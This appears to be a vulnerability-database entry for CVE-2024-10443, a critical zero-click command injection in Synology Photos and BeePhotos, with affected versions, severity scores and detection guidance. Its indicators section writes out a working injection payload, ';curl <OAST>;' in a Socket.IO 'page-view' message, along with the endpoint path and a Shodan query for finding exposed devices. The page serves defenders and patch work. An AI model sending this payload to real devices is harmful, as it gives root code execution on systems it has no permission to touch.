cbcvebase.
CVE-2024-10443
published 2024-11-15

CVE-2024-10443: Improper neutralization of special elements used in an OS command ('OS Command Injection') vulnerability in Task Manager component in Synology BeePhotos before…

PriorityP184critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
28.38%
97.9th percentile
Improper neutralization of special elements used in an OS command ('OS Command Injection') vulnerability in Task Manager component in Synology BeePhotos before 1.0.2-10026 and 1.1.0-10053 and Synology Photos before 1.6.2-0720 and 1.7.0-0795 allows remote attackers to execute arbitrary code via unspecified vectors.

Affected

8 ranges
VendorProductVersion rangeFixed in
synologybeephotos< 1.1.0-100531.1.0-10053
synologybeephotos< 1.0.2-100261.0.2-10026
synologybeephotos>= * < 1.1.0-100531.1.0-10053
synologybeephotos>= * < 1.0.2-100261.0.2-10026
synologyphotos< 1.6.2-07201.6.2-0720
synologyphotos< 1.7.0-07951.7.0-0795
synologysynology_photos>= * < 1.7.0-07951.7.0-0795
synologysynology_photos>= * < 1.6.2-07201.6.2-0720

Detection & IOCsextracted from sources · hover to see the quote

urlws://[host]/FotoSocketIo/socket.io/?transport=websocket&EIO=4
path/FotoSocketIo/socket.io/
command42["page-view",{"id_user": ";curl <OAST>;", "timestamp": 0, "location": "xxd"}]
othershodan-query: html:"BeeStation"
  • Exploit arrives as an unauthenticated WebSocket connection to /FotoSocketIo/socket.io/?transport=websocket&EIO=4; monitor for WebSocket upgrade requests to this path from untrusted sources.
  • The injection is delivered inside the 'id_user' field of a 'page-view' WebSocket event (Socket.IO message type 42); alert on semicolon-delimited shell commands in that field.
  • The vulnerability is zero-click and requires no authentication; any inbound WebSocket connection to the Task Manager endpoint should be treated as suspicious on unpatched devices.
  • Use Shodan dork html:"BeeStation" to identify Internet-exposed vulnerable devices for proactive scanning and patching.
  • Exploitation results in code execution as root; look for unexpected outbound curl/DNS requests originating from the Synology Photos or BeePhotos process after a WebSocket page-view event.
  • ·Patches are NOT automatically applied; administrators must manually upgrade to the fixed versions to remediate the vulnerability.
  • ·The Nuclei PoC template requires the websocket-client Python package and Python 3 to be pre-installed on the system running the scanner.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.